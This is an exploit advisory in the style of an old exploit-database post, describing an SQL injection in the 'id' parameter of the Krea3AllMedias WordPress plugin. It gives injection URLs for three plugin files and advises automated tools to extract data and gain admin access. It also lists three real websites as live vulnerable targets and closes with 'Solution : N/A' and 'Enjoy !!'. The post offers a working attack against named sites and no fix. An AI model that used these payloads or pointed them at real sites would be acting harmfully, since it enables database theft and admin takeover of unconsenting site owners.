# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0      _                   __           __       __                      1
# 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
# 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
# 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
# 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
# 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
# 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
# 1                   \ \____/ >> Exploit database separated by exploit    0
# 0                    \/___/          type (local, remote, DoS, etc.)     1
# 1                                                                        1
# 0   [x] Official Website: http://www.1337day.com                         0
# 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
# 0                                                                        0
# 1               ==========================================               1
# 0                                                                        0
# 0                                                                        1
# 1                       dark-puzzle[at]live[at]fr                        0
# 0               ==========================================               1
# 1                              White Hat                                 1
# 0                         Independant Pentester                          0
# 1                      exploit coder/bug researcher                      0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
# Title   : Wordpress Plugins - Krea3AllMedias SQL Injection Vulnerability
# Author  : Dark-Puzzle (Souhail Hammou)   
# Date    : 14th September 2012
# Risk     : High
# Vendor   : www.krea3.fr
# Tested On : Windows XP SP3 - Fr & Backtrack 5 R3
# Greetings : Inj3ct0rs - Offensive Security - Security Focus - Packetstorm Security .
# Contact Me: www.facebook.com/dark-puzzle / dark-puzzle@live.fr
#####################################################################################

Krea3AllMedias Wordpress Plugin is prone to an SQL Injection Vulnerability that can be exploited using an automated program .
The 'id' parameter cannot be injected manually because it's impossible to detect the infected column with a Union+Select Request .
Simply Because nothing is displayed in the webpage . So using an Automated tool can easily help you to inject DATA from the website and get admin access.

I recommend you using : SQLmap for Linux & Havij For Windows .

#####################################################################################

'id' parameter is injectable in playlist.php , LineGallery.php , ArtGallery.php .

#####################################################################################
Examples :

http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1'
http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/premium/ArtGallery.php?id=1'
http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/premium/LineGallery.php?id=1'

#####################################################################################

Live Examples :

http://www.krea3.fr/wp-content/plugins/Krea3Allmedias/application/services/premium/LineGallery.php?id=5
http://www.restaurant-honfleur-alcyone.fr/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1
http://www.beuzeville-tourisme.com/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1

Admin Panel :

http://www.example.com/wp-admin

#####################################################################################
Solution : N/A
#####################################################################################

Many Infected Websites . Enjoy !!

#Datasec Team .